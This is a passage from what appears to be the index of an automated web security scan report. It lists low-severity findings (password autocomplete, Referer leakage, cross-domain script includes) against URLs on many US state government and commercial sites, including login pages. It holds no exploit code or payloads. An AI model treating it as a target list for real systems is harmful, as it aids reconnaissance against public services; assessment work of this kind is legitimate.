14.366. http://in.gov/core/images/tab_right.gif
14.367. http://in.gov/core/images/topnav_bg.jpg
14.368. http://in.gov/core/images/topnav_left.jpg
14.369. http://in.gov/core/images/topnav_right.jpg
14.370. http://in.gov/core/index_pages/quicklinks.html
14.371. http://in.gov/core/index_pages/void()
14.372. http://in.gov/core/js/_arss.js
14.373. http://in.gov/core/js/agency.js
14.374. http://in.gov/core/js/arss.css
14.375. http://in.gov/core/js/arss.js
14.376. http://in.gov/core/js/faq.js
14.377. http://in.gov/core/js/jquery-1.4.2.min.js
14.378. http://in.gov/core/js/jquery.jfontsizer.js
14.379. http://in.gov/core/js/jquery.metadata.min.js
14.380. http://in.gov/core/js/jquery.slideshow.js
14.381. http://in.gov/core/js/jquery.swapimage.min.js
14.382. http://in.gov/core/js/menu.js
14.383. http://in.gov/core/js/portal_scripts.js
14.384. http://in.gov/core/js/prototype-1.6.1.js
14.385. http://in.gov/core/online_services.html
14.386. http://in.gov/favicon.ico
14.387. http://in.gov/gov/photo.htm
14.388. http://in.gov/sos/securities/2521.htm
14.389. http://in.gov/spd/2333.htm
14.391. http://io9.com/assets/base.v9/js/selcontsimple.js
14.392. https://iris.custhelp.com/
14.394. https://iris.custhelp.com/app/home
14.395. https://iris.custhelp.com/euf/assets/css/2009/jkmegamenu.css
14.396. https://iris.custhelp.com/euf/assets/css/2009/va-styles.css
14.397. https://iris.custhelp.com/euf/assets/css/2009/va-user-styles.css
14.398. https://iris.custhelp.com/euf/assets/css/2009/vaSearch.css
14.400. https://iris.custhelp.com/rnt/rnw/css/enduser.css
14.401. https://iris.custhelp.com/rnt/rnw/img/enduser/2009/img-bullet.gif
14.402. https://iris.custhelp.com/rnt/rnw/javascript/2009/global.js
14.403. https://iris.va.gov/favicon.ico
14.404. http://kdkgllry.netmng.com/
14.405. http://khmdb0.google.com/kh
14.406. http://khmdb1.google.com/kh
14.407. http://ksgovernment.feedbacksurvey.sgizmo.com/
14.408. https://maps-api-ssl.google.com/maps
14.409. http://metrics.kodakgallery.com/b/ss/kinkodakgallerycomprod/1/H.22.1/s78523519213777
14.411. http://newbrowse.livehelper.com/servlet/lhBrowse
14.413. https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php
14.414. http://pipes.yahoo.com/pipes/pipe.run
14.415. https://pixel.fetchback.com/serve/fb/pdc
14.416. http://pixel.mathtag.com/event/img
14.417. http://pixel.quantserve.com/pixel
14.418. http://pixel.rubiconproject.com/tap.php
14.419. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/h/
14.421. http://scholar.google.com/schhp
14.423. http://sdc.state.nj.us/dcs9ir25300000ggffs6h6i8r_2f2e/dcs.gif
14.424. http://sdc.state.nj.us/dcs9ir25300000ggffs6h6i8r_2f2e/dcs.gif
14.425. http://server.iad.liveperson.net/hc/33511087/
14.426. http://server.iad.liveperson.net/hc/33511087/
14.427. http://server.iad.liveperson.net/hc/33511087/x.js
14.428. http://shots.snap.com/snap_shots.js
14.429. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s21968461417127
14.430. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s22063515547197
14.431. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s22238083938136
14.432. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s25464643554296
14.433. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s27148967052344
14.434. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s2762329166755
14.435. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s27866187379695
14.436. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s27866187379695
14.437. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s29011461706832
14.438. http://statse.webtrendslive.com/dcs5fmvbf00000cprngdzyrz5_9u7t/dcs.gif
14.439. http://statse.webtrendslive.com/dcs5fmvbf00000cprngdzyrz5_9u7t/dcs.gif
14.440. http://statse.webtrendslive.com/dcsvtpx6221e5hyrdsxs9yl5f_6q9i/njs.gif
14.441. http://translate.googleapis.com/translate_a/l
14.442. https://treas-secure.treas.state.mi.us/eservice_enu/start.swe
14.443. http://twitter.com/statuses/user_timeline/IDAHOgov.json
14.445. http://video.google.com/
14.446. http://visitor.constantcontact.com/d.jsp
14.447. http://wbtdcs.nara.gov/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif
14.448. http://webmail.aol.com/
14.449. http://wt-sdc-01.ai.org/dcsc11w1f000000spafo59hrd_4w9q/dcs.gif
14.450. http://wt-sdc-01.ai.org/dcsc11w1f000000spafo59hrd_4w9q/dcs.gif
14.451. https://www.accesskansas.org/images/footer_images/current_year.gif
14.452. https://www.accesskansas.org/images/footer_images/from2002.gif
14.453. https://www.accesskansas.org/kbc/img/icons/external.png
14.454. http://www.act.org/certificate/employers.html
14.455. https://www.alabamainteractive.org/favicon.ico
14.456. http://www.amberalert.com/en/alerts/state/
14.457. http://www.atg.wa.gov/BlogPost.aspx
14.458. https://www.bbb.org/online/consumer/cks.aspx
14.459. http://www.blogs.va.gov/VAntage/
14.460. http://www.colorado.gov/cms/coloradogov/images/bgrd_bulletBlue.gif
14.461. http://www.colorado.gov/cms/coloradogov/images/bgrd_callBoxGray.gif
14.462. http://www.colorado.gov/cms/coloradogov/images/bgrd_cbe3.gif
14.463. http://www.colorado.gov/cms/coloradogov/images/bgrd_lottoBack2.gif
14.464. http://www.colorado.gov/cms/coloradogov/images/bgrd_stateLegTabSeal.png
14.465. http://www.colorado.gov/cms/coloradogov/images/bgrd_tabPanel-dash.gif
14.466. http://www.colorado.gov/cms/coloradogov/images/bgrd_tabPanel2.gif
14.467. http://www.colorado.gov/cms/coloradogov/images/bgrd_tabPanel4.gif
14.468. http://www.colorado.gov/cms/coloradogov/images/img_cash5Short.gif
14.469. http://www.colorado.gov/cms/coloradogov/images/img_leftArrow.gif
14.470. http://www.colorado.gov/cms/coloradogov/images/img_leftArrow_disable.gif
14.471. http://www.colorado.gov/cms/coloradogov/images/img_lottoBall.png
14.472. http://www.colorado.gov/cms/coloradogov/images/img_lottoBallGreen.png
14.473. http://www.colorado.gov/cms/coloradogov/images/img_lottoShort.gif
14.474. http://www.colorado.gov/cms/coloradogov/images/img_matchplayShort.gif
14.475. http://www.colorado.gov/cms/coloradogov/images/img_megamillionsShort.gif
14.476. http://www.colorado.gov/cms/coloradogov/images/img_powerballShort.gif
14.477. http://www.colorado.gov/cms/coloradogov/images/img_rightArrow.gif
14.478. http://www.colorado.gov/cms/coloradogov/images/img_rightArrow_disable.gif
14.479. http://www.colorado.gov/cms/coloradogov/images/tab_CBE2-blu.gif
14.480. http://www.colorado.gov/cms/coloradogov/images/tab_agHiLt-clr.gif
14.481. http://www.colorado.gov/cms/coloradogov/images/tab_alerts-red.gif
14.482. http://www.colorado.gov/cms/coloradogov/images/tab_govInt-govTrns-blu.gif
14.483. http://www.colorado.gov/cms/coloradogov/images/tab_howdoi-blu.gif
14.484. http://www.colorado.gov/cms/coloradogov/images/tab_infofor-blu.gif
14.485. http://www.colorado.gov/cms/coloradogov/images/tab_services-blu.gif
14.486. http://www.colorado.gov/cms/coloradogov/images/tab_services-clr.gif
14.487. http://www.colorado.gov/cms/coloradogov/images/tab_stateLeg-blu.gif
14.488. http://www.colorado.gov/cms/coloradogov/images/tab_statenews-blu.gif
14.489. http://www.colorado.gov/cms/coloradogov/images/tab_statenews-clr.gif
14.490. http://www.colorado.gov/cms/coloradogov/images/tab_traffic-blu.gif
14.491. http://www.colorado.gov/cms/coloradogov/images/tab_weather-blu.gif
14.492. http://www.colorado.gov/cms/coloradogov/images/tab_weather-clr.gif
14.493. https://www.colorado.gov/apps/dps/mvvs/public/entry.jsf
14.494. https://www.colorado.gov/apps/feedback/servlet/begin
14.495. http://www.conwaygreene.com/nmsu/lpext.dll
14.496. http://www.ct.gov/ctportal/cwp/view.asp
14.497. http://www.ct.gov/ctportal/site/default.asp
14.498. http://www.ct.gov/ctportal/taxonomy/taxonomy.asp
14.499. http://www.ct.gov/dcp/cwp/view.asp
14.500. http://www.ct.gov/dep/cwp/view.asp
14.501. http://www.ct.gov/dmv/cwp/view.asp
14.502. http://www.ct.gov/drs/cwp/view.asp
14.503. http://www.ct.gov/opm/cwp/view.asp
14.504. http://www.dms.myflorida.com/business_operations/state_purchasing/myflorida_marketplace
14.508. http://www.elearningnc.gov/
14.509. http://www.facebook.com/TeamHaslam
14.510. http://www.facebook.com/WSDOL
14.511. http://www.facebook.com/note.php
14.512. http://www.facebook.com/ohiodivisionofwatercraft
14.513. http://www.facebook.com/pages/Austin-TX/Texasgov/117263931626845
14.516. http://www.facebook.com/photo.php
14.517. http://www.facebook.com/share.php
14.518. http://www.facebook.com/video/video.php
14.519. http://www.flickr.com/groups_join.gne
14.520. http://www.governor.ct.gov/malloy/cwp/view.asp
14.521. http://www.governor.ny.gov/
14.522. https://www.humanservices.state.pa.us/Compass.Web/CMHOM.aspx
14.523. http://www.ieaddons.com/en/ie8slice/wsUpdate.aspx
14.524. http://www.illinoisfilm.biz/index.php
14.525. http://www.in.gov/ai/appfiles/cms/alert.css
14.526. http://www.in.gov/ai/appfiles/oss/oss_logos/bmv_oss.jpg
14.527. http://www.in.gov/ai/errors/dwd_404.html
14.528. http://www.in.gov/ai/js-webtrends/webtrends.js
14.529. http://www.in.gov/ai/js-webtrends/wtbase.js
14.530. http://www.in.gov/apps/options/email.aspx
14.531. http://www.in.gov/apps/options/rate.aspx
14.532. http://www.in.gov/apps/options/suggestion.aspx
14.533. http://www.in.gov/core/faqs.html
14.534. http://www.in.gov/dhs/3163.htm
14.535. http://www.in.gov/dnr/6406.htm
14.536. http://www.in.gov/dwd/2216.css
14.537. http://www.in.gov/dwd/2217.js
14.538. http://www.in.gov/dwd/WorkOne//
14.539. http://www.in.gov/dwd/WorkOne//favicon.ico
14.540. http://www.in.gov/dwd/WorkOne//images/body_bg.gif
14.541. http://www.in.gov/dwd/WorkOne//images/index_footer.jpg
14.542. http://www.in.gov/dwd/WorkOne//images/index_people.png
14.543. http://www.in.gov/dwd/WorkOne//images/wrapper_bg.gif
14.544. http://www.in.gov/dwd/WorkOne//scripts/gfeedfetcher.js
14.545. http://www.in.gov/dwd/WorkOne//styles/index_layout.css
14.546. http://www.in.gov/dwd/WorkOne//styles/index_styles.css
14.547. http://www.in.gov/dwd/WorkOne//styles/layout.css
14.548. http://www.in.gov/dwd/WorkOne//styles/reset.css
14.549. http://www.in.gov/dwd/WorkOne//styles/styles.css
14.550. http://www.in.gov/dwd/WorkOne/images/index_arrow.png
14.551. http://www.in.gov/dwd/WorkOne/images/index_title.png
14.552. http://www.in.gov/dwd/WorkOne/scripts//dwd/WorkOne/scripts/indicator.gif
14.553. http://www.in.gov/dwd/images/GovDev_Left_Logo.jpg
14.554. http://www.in.gov/dwd/images/amber_void.jpg
14.555. http://www.in.gov/dwd/images/col2_top_bg.jpg
14.556. http://www.in.gov/dwd/images/col3_top_bg.gif
14.557. http://www.in.gov/dwd/images/faq_bg.jpg
14.558. http://www.in.gov/dwd/images/link_header_bg.jpg
14.559. http://www.in.gov/dwd/images/navMore.gif
14.560. http://www.in.gov/dwd/images/subscribe_dwd.jpg
14.561. http://www.in.gov/dwd/images/uplink_btn_rdax_100_rdax_100.jpg
14.562. http://www.in.gov/dwd/images/want_bg.jpg
14.563. http://www.in.gov/dwd/images/widget2_rdax_100_rdax_100.jpg
14.564. http://www.in.gov/idem/hoosierscare/5601.htm
14.565. http://www.in.gov/iedc/
14.566. http://www.in.gov/isda/2435.htm
14.567. http://www.in.gov/oed/2367.htm
14.568. http://www.in.gov/oed/2572.htm
14.569. http://www.in.gov/pla/license.htm
14.570. http://www.in.gov/portal/global/css/5.css
14.571. http://www.in.gov/portal/global/css/7.css
14.572. http://www.in.gov/portal/global/images/about_bg.jpg
14.573. http://www.in.gov/portal/global/images/bullet_white.gif
14.574. http://www.in.gov/portal/global/images/header.jpg
14.575. http://www.in.gov/portal/global/images/horz_nav.jpg
14.576. http://www.in.gov/portal/global/images/horz_nav2_bg.jpg
14.577. http://www.in.gov/portal/global/images/mobile-icon-hover4.gif
14.578. http://www.in.gov/portal/global/images/nav_bg.jpg
14.579. http://www.in.gov/portal/global/images/rss-logo.jpg
14.580. http://www.in.gov/portal/global/images/search_bg.jpg
14.581. http://www.in.gov/portal/global/images/tour_bg.jpg
14.582. http://www.in.gov/portal/global/javascript/9.js
14.583. http://www.in.gov/portal/images/amberalert.jpg
14.584. http://www.in.gov/portal/images/amberalerttest.jpg
14.585. http://www.in.gov/portal/images/govdev_icon0.gif
14.586. http://www.in.gov/portal/images/horz_nav2_bg_solid.jpg
14.587. http://www.in.gov/portal/images/link.gif
14.588. http://www.in.gov/portal/images/linkhover.gif
14.589. http://www.in.gov/portal/images/mail.gif
14.590. http://www.in.gov/portal/images/mobile-icon.gif
14.591. http://www.in.gov/portal/images/print.gif
14.592. http://www.in.gov/portal/images/rate.gif
14.593. http://www.in.gov/portal/images/rss_logo.gif
14.594. http://www.in.gov/portal/images/search_button.jpg
14.595. http://www.in.gov/recycle/5636.htm
14.596. http://www.indianacareerconnect.com/
14.597. https://www.mcafeesecure.com/RatingVerify
14.598. http://www.mdod.maryland.gov/WorkArea/linkit.aspx
14.599. http://www.michie.com/tennessee/lpext.dll
14.600. http://www.michigan.org/Partners/Default.aspx
14.601. http://www.ncesc.com/lmi/default.asp
14.602. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/Ohio457-site.css
14.603. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/base-style.css
14.604. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/print.css
14.606. https://www.nrsservicecenter.com/content/media/retail/images/Logos/Ohio457.gif
14.607. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/bgGrads/bgGradient.jpg
14.610. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/navTabs/tabLeft.gif
14.611. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/navTabs/tabRight.gif
14.613. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/sprites/login-lock.gif
14.614. https://www.nrsservicecenter.com/content/media/retail/js/wtlOhio.js
14.615. https://www.nrsservicecenter.com/favicon.ico
14.616. http://www.nv.gov/NV_default4.aspx
14.617. http://www.nv.gov/WorkArea/DmsMenu/DmsMenu.js
14.618. http://www.nv.gov/WorkArea/java/ektron.js
14.619. http://www.nv.gov/WorkArea/java/thickbox.js
14.620. http://www.nv.gov/workarea/java/ektronJs.ashx
14.621. https://www.ri.gov/Licensing/renewal/license.php
14.622. http://www.sc.gov/PublishingImages/favicon.ico
14.623. https://www.scsignon.sc.gov/
14.624. https://www.scsignon.sc.gov/Common/HelpWindow.aspx
14.625. https://www.scsignon.sc.gov/Eng/Secured/Security/ForgotPassword.aspx
14.626. https://www.scsignon.sc.gov/Eng/Secured/Security/ForgotUserName.aspx
14.627. https://www.scsignon.sc.gov/Login.aspx
14.628. https://www.scsignon.sc.gov/SCBOS.Core.DynamicFormsGlobal.Resources.aspx
14.629. https://www.scsignon.sc.gov/SCBOS.Core.Framework.Imaging.Resources.aspx
14.630. https://www.scsignon.sc.gov/SCBOS.Core.Framework.Web.Controls.Resources.aspx
14.631. https://www.scsignon.sc.gov/SCBOS.Core.Framework.Web.UI.Resources.aspx
14.632. https://www.scsignon.sc.gov/WebResource.axd
14.633. https://www.scsignon.sc.gov/eng/Secured/Security/CreateUserName.aspx
14.634. http://www.state.co.us/gov_dir/leg_dir/gaweb/scroom353.asx
14.635. http://www.state.mn.us/portal/mn/jsp/content.do
14.636. http://www.state.mn.us/portal/mn/jsp/contentprocess.do
14.637. http://www.state.mn.us/portal/mn/jsp/home.do
14.638. http://www.state.mn.us/portal/mn/jsp/hybrid.do
14.639. http://www.state.mn.us/portal/mn/jsp/logon.do
14.640. http://www.state.mn.us/portal/mn/jsp/redirectLink.do
14.641. http://www.state.mn.us/portal/mn/jsp/search.do
14.642. http://www.state.sd.us/calendar/index.cfm
14.643. http://www.surveymonkey.com/jsPop.aspx
14.644. http://www.va.gov/directory/guide/division_flsh.asp
14.645. http://www.va.gov/iris/home.html
14.646. http://www.va.gov/landing2_contact.htm
14.647. http://www.va.gov/opa/pressrel/pressrelease.cfm
14.648. http://www.visitflorida.com/includes/js/footerSurvey.php
14.649. http://www.vitalchek.com/Campaign
14.650. http://www.vitalchek.com/Campaign/
14.651. http://www.vitalchek.com/Telerik.Web.UI.WebResource.axd
14.652. http://www.vitalchek.com/WebResource.axd
14.653. http://www.vitalchek.com/css/Portal/VitalChek/main.aspx
14.654. http://www.vitalchek.com/default.aspx
14.655. http://www.vitalchek.com/images/background/bg_chat.png
14.656. http://www.vitalchek.com/js/google_analytics_js.aspx
14.657. http://www.wor710.com/topic/play_window.php
14.658. http://www.wycokck.org/dept.aspx
15. Password field with autocomplete enabled
15.1. https://apps.tn.gov/biztax-app/login.html
15.2. https://bugzilla.mozilla.org/show_bug.cgi
15.3. https://bugzilla.mozilla.org/show_bug.cgi
15.5. https://dotax.ehawaii.gov/efile/user
15.6. https://mibid.bidcorp.com/Login.aspx
15.7. https://mibid.bidcorp.com/login.aspx
15.8. https://myalaska.state.ak.us/home/app
15.9. https://myalaska.state.ak.us/login/login.aspx
15.10. http://myflorida.custhelp.com/cgi-bin/myflorida.cfg/php/enduser/acct_login.php
15.11. https://nhlicenses.nh.gov/MyLicense%20Enterprise/
15.12. https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php
15.13. https://onestop.michigan.gov/OneStop/a
15.14. https://onestop.michigan.gov/css/none
15.15. https://onestop.michigan.gov/images/imgBanBG.gif
15.16. https://onestop.michigan.gov/onestop-main/OneStop/a
15.17. https://onestop.michigan.gov/onestop-main/OneStop/obDesiredBiz.do
15.18. http://pa.gov/portal/server.pt
15.19. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login
15.20. http://www.alabama.gov/portal/index.jsp
15.21. https://www.compasssmartshopper.com/default.aspx
15.22. https://www.ehawaii.gov/efile/
15.23. http://www.facebook.com/TeamHaslam
15.24. http://www.facebook.com/WSDOL
15.25. http://www.facebook.com/note.php
15.26. http://www.facebook.com/ohiodivisionofwatercraft
15.27. http://www.facebook.com/photo.php
15.28. http://www.facebook.com/share.php
15.29. https://www.humanservices.state.pa.us/Compass.Web/CMHOM.aspx
15.30. https://www.humanservices.state.pa.us/siteminderagent/forms/calen2.fcc
15.31. https://www.humanservices.state.pa.us/siteminderagent/forms/calen2.fcc
15.32. https://www.myhealth.va.gov/mhv-portal-web/anonymous.portal
15.33. https://www.nrsservicecenter.com/iApp/ret/cmd/RetLogin
15.34. https://www.nrsservicecenter.com/iApp/ret/content/landing.do
15.35. https://www.nrsservicecenter.com/iApp/ret/landing.do
15.36. https://www.nrsservicecenter.com/iApp/ret/showPage.do
15.37. https://www.scsignon.sc.gov/
15.38. https://www.scsignon.sc.gov/
15.39. https://www.scsignon.sc.gov/Login.aspx
15.40. https://www.vermontjoblink.com/ada/
15.41. https://www.vermontjoblink.com/ada/default.cfm
15.42. https://www.vermontjoblink.com/ada/etp/etp_newuser_dsp.cfm
15.43. https://www.vermontjoblink.com/ada/etp/etp_newuser_dsp.cfm
15.44. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm
15.45. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm
15.46. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm
15.47. https://www.vermontjoblink.com/ada/works/Login.cfm
15.48. https://www.vermontjoblink.com/ada/works/Login.cfm
15.49. http://www.visitflorida.com/floridalive
15.51. http://www.vsea.org/editorial-lays-out-vermont%26%23039
15.52. http://www.vsea.org/favicon.ico
15.53. http://www.vsea.org/join-vsea
15.54. http://www.vsea.org/join-your-union
15.55. http://www.vsea.org/maine-study-finds-state%26%23039
15.56. http://www.vsea.org/node
15.57. http://www.vsea.org/purchase-vsea-clothing
15.58. http://www.vsea.org/state-hospital%26%23039
16.1. http://data.ok.gov/packages/base.js
16.2. http://data.ok.gov/packages/shared-map.js
16.3. http://data.ok.gov/packages/shared-table-editor.js
16.4. https://onestop.michigan.gov/onestop-main/OneStop/js/actionSubmit.js
16.5. http://www.archives.gov/includes/javascript/DD_roundies_0.0.2a-min.js
16.6. http://www.dot.state.tx.us/txdoteforms/GetForm
16.7. https://www.humanservices.state.pa.us/Compass.Web/CMHOM.aspx
16.8. https://www.humanservices.state.pa.us/Compass.Web/CPACM.aspx
16.9. https://www.humanservices.state.pa.us/Compass.Web/MenuItems/CompassHelpTool.aspx
16.10. https://www.humanservices.state.pa.us/Compass.Web/MenuItems/LearnAboutCompass.aspx
16.11. https://www.humanservices.state.pa.us/Compass.Web/MenuItems/OtherLanguage.aspx
16.12. https://www.humanservices.state.pa.us/Compass.Web/MenuItems/SeeAllBenefits.aspx
16.13. https://www.humanservices.state.pa.us/Compass.Web/MenuItems/SystemCompatibility.aspx
16.14. https://www.humanservices.state.pa.us/compass.web/MenuItems/ContactUs.aspx
16.15. https://www.humanservices.state.pa.us/compass.web/MenuItems/GeneralInfoFaq.aspx
16.16. https://www.humanservices.state.pa.us/compass.web/MenuItems/SiteMapAfs.aspx
16.17. https://www.humanservices.state.pa.us/compass.web/MenuItems/help.aspx
16.18. https://www.humanservices.state.pa.us/compass.web/Menuitems/ADACompliance.aspx
16.19. https://www.humanservices.state.pa.us/compass.web/Menuitems/BrowserCompat.aspx
16.20. https://www.humanservices.state.pa.us/compass.web/Menuitems/Confidential.aspx
16.21. http://www.nccourts.org/Common/JScript/Common.js
16.22. http://www.portal.state.pa.us/imageserver/plumtree/common/private/js/jsxml/LATEST/PTXML.js
16.23. http://www.txdot.gov/txdoteforms/GetForm
16.24. http://www.utah.gov/js/DD_roundies_0.0.2a-min.js
17. Referer-dependent response
17.1. http://ads.adbrite.com/adserver/vdi/711384
17.2. http://api.twitter.com/1/statuses/user_timeline/okgov.json
17.3. http://emergency.louisiana.gov/ga.js
17.4. http://twitter.com/statuses/user_timeline/IDAHOgov.json
17.5. http://www.facebook.com/plugins/like.php
17.6. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm
18.1. http://johncarney.house.gov/
18.3. http://milottery.state.mi.us/msl-og-detail.php
18.4. https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/chat.php
18.5. http://pa.gov/portal/server.pt
18.6. http://pa.gov/portal/server.pt/community/pa_gov/2966
18.7. http://www.buzgate.org/8.0/ny/fh.html
18.8. http://www.buzgate.org/8.0/ny/fh.html
18.9. http://www.doleta.gov/disability/new_dpn_grants.cfm
18.10. http://www.nist.gov/search-results.cfm
18.11. http://www.nist.gov/srd/onlinelist.htm
18.13. http://www.vsea.org/editorial-lays-out-vermont%26%23039
18.14. http://www.vsea.org/favicon.ico
18.15. http://www.vsea.org/join-vsea
18.16. http://www.vsea.org/join-your-union
18.17. http://www.vsea.org/maine-study-finds-state%26%23039
18.18. http://www.vsea.org/node
18.19. http://www.vsea.org/purchase-vsea-clothing
18.20. http://www.vsea.org/state-hospital%26%23039
18.21. http://www.vsea.org/user/password
18.22. http://www.vsea.org/user/register
19. Cross-domain Referer leakage
19.1. http://cdn.livestream.com/embedfiles/embed-min.js
19.2. http://cm.g.doubleclick.net/pixel
19.3. http://data.ok.gov/packages/shared-map.js
19.4. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libdatalinks.show
19.5. http://fls.doubleclick.net/activityi
19.6. http://ga.gov/00/home/0,2061,4802,00.html
19.7. http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp
19.8. http://googleads.g.doubleclick.net/pagead/ads
19.9. http://googleads.g.doubleclick.net/pagead/ads
19.10. http://googleads.g.doubleclick.net/pagead/ads
19.11. http://home.mcafee.com/Default.aspx
19.12. http://home.mcafee.com/Root/AboutUs.aspx
19.13. http://home.mcafee.com/root/dynamicpage.aspx
19.14. http://image.providesupport.com/js/hic/safe-standard.js
19.15. http://image.providesupport.com/js/hic/safe-standard.js
19.16. http://io9.com/assets/base.v9/js/readability.js
19.17. http://kentucky.gov/feedback.aspx
19.18. http://landmark-project.com/feed2js/feed2js.php
19.19. http://legis.delaware.gov/Legislature.nsf/Lookup/House_Home
19.20. http://legis.delaware.gov/legislature.nsf/Lookup/Divisions_Home
19.21. http://myflorida.custhelp.com/cgi-bin/myflorida.cfg/php/enduser/acct_login.php
19.22. http://myflorida.custhelp.com/cgi-bin/myflorida.cfg/php/enduser/std_alp.php
19.23. https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php
19.24. http://pa.gov/portal/server.pt
19.25. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm
19.26. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm
19.27. http://www.adfg.alaska.gov/index.cfm
19.28. http://www.alabama.gov/portal/secondary.jsp
19.29. http://www.alabama.gov/portal/secondary.jsp
19.31. http://www.coloradochannel.net/sites/all/modules/lightbox2/js/lightbox_video.js
19.32. http://www.ct.gov/ctportal/cwp/view.asp
19.33. http://www.dhh.louisiana.gov/offices/page.asp
19.34. http://www.facebook.com/plugins/like.php
19.35. http://www.georgia.gov/external/
19.36. http://www.google.com/search
19.37. http://www.google.com/url
19.38. http://www.in.gov/dwd/WorkOne//
19.39. http://www.leg.state.co.us/clics/clics2011a/cslFrontPages.nsf/Audio
19.40. https://www.mcafeesecure.com/RatingVerify
19.41. http://www.missingkids.com/missingkids/servlet/PageServlet
19.42. http://www.missingkids.com/missingkids/servlet/PageServlet
19.43. http://www.ms.gov/ms_sub_template.jsp
19.44. http://www.nccourts.org/Citizens/GoToCourt/Default.asp
19.45. http://www.nhfishandgame.com/cgi-bin/gl/outdoor.cgi
19.46. http://www.nist.gov/search-results.cfm
19.47. https://www.nrsservicecenter.com/iApp/ret/content/landing.do
19.48. http://www.nv.gov/NV_default4.aspx
19.49. http://www.nysegov.com/citGuide.cfm
19.50. http://www.nysegov.com/citguide.cfm
19.51. https://www.paybill.com/Common/Left.asp
19.52. https://www.scsignon.sc.gov/
19.53. http://www.state.mn.us/portal/mn/jsp/home.do
19.54. https://www.tennesseeanytime.org/pmnout/notice/listByMonth
19.55. http://www.texas.gov/en/search/Pages/results.aspx
19.56. http://www.vsea.org/purchase-vsea-clothing
20. Cross-domain script include
20.1. https://apps.tn.gov/bizreg/
20.2. https://apps.tn.gov/biztax/
20.4. http://az.gov/services_tourism.html
20.5. http://blog.nheconomy.com/
20.6. http://cityofmuscleshoals.com/Default.asp
20.7. http://climate.rutgers.edu/njwxnet/station.php
20.8. http://courts.delaware.gov/Help/fcrecordaccess.stm
20.10. http://data.ok.gov/browse
20.11. http://de.gov/profile.php
20.12. http://de.gov/topics/yourgovernment
20.14. http://dola.colorado.gov/dem/index.html
20.15. http://emergency.louisiana.gov/
20.16. http://finance.yahoo.com/q
20.17. http://fls.doubleclick.net/activityi
20.18. http://ga.gov/00/channel_createdate/0,2095,4802_49268007,00.html
20.19. http://ga.gov/00/channel_title/0,2094,4802_13167990,00.html
20.20. http://ga.gov/00/channel_title/0,2094,4802_4965,00.html
20.21. http://ga.gov/00/channel_title/0,2094,4802_4969,00.html
20.22. http://ga.gov/00/channel_title/0,2094,4802_5035,00.html
20.23. http://ga.gov/00/home/0,2061,4802,00.html
20.24. http://ga.gov/00/mobile/0,2783,4802,00.html
20.25. http://googleads.g.doubleclick.net/pagead/ads
20.26. http://googleads.g.doubleclick.net/pagead/ads
20.27. http://gov.louisiana.gov/index.cfm
20.28. http://groups.google.com/grphp
20.29. http://home.mcafee.com/AdviceCenter/Default.aspx
20.30. https://home.mcafee.com/Secure/Protected/Login.aspx
20.31. http://ia.gov/livehelp.html
20.33. http://idaho.gov/public/portal/contact.html
20.34. http://idaho.gov/search.html
20.36. http://in.gov/core/agriculture.html
20.37. http://in.gov/core/business.html
20.38. http://in.gov/core/index_pages/void()
20.39. http://in.gov/core/js/arss.css
20.40. http://in.gov/core/online_services.html
20.41. http://in.gov/gov/photo.htm
20.42. http://in.gov/sos/securities/2521.htm
20.43. http://in.gov/spd/2333.htm
20.45. http://itunes.apple.com/app/eyes-and-ears-on-kentucky/id422703420
20.46. http://itunes.apple.com/us/app/indiana-dnr/id395591679
20.47. http://itunes.apple.com/us/app/netflix/id363590051
20.48. http://itunes.apple.com/us/app/ri-gov/id374968524
20.49. http://johncarney.house.gov/press-release/rep-carney-statement-budget-agreement
20.51. http://jqueryui.com/themeroller/
20.52. http://kentucky.gov/Pages/home.aspx
20.53. http://kentucky.gov/feedback.aspx
20.54. http://la.gov/includes/banner/emergencybanner.js
20.55. http://licensingexpress.wordpress.com/
20.57. http://obm.ohio.gov/document.aspx
20.61. http://pa.gov/portal/server.pt
20.62. http://pa.gov/portal/server.pt/community/pa_gov/2966
20.63. http://sc.gov/Pages/default.aspx
20.64. https://secure.kentucky.gov/portal/login.aspx
20.65. https://secure.missingkids.com/missingkids/servlet/CybertipServlet
20.66. https://securetransactions.mva.maryland.gov/emvastore/MainMenu.aspx
20.68. https://txapps.texas.gov/tolapp/txdl/welcome.dl
20.69. https://unitedalert.com/
20.70. http://www.511ia.org/default.asp
20.71. http://www.addthis.com/bookmark.php
20.72. http://www.agriculture.state.tn.us/Marketing.asp
20.73. http://www.alabama.gov/portal/index.jsp
20.74. http://www.alabama.gov/portal/secondary.jsp
20.75. http://www.amberalert.com/en/alerts/state/
20.76. http://www.archives.gov/shop/
20.77. http://www.archives.gov/veterans/evetrecs/index.html
20.78. http://www.archives.gov/veterans/military-service-records/
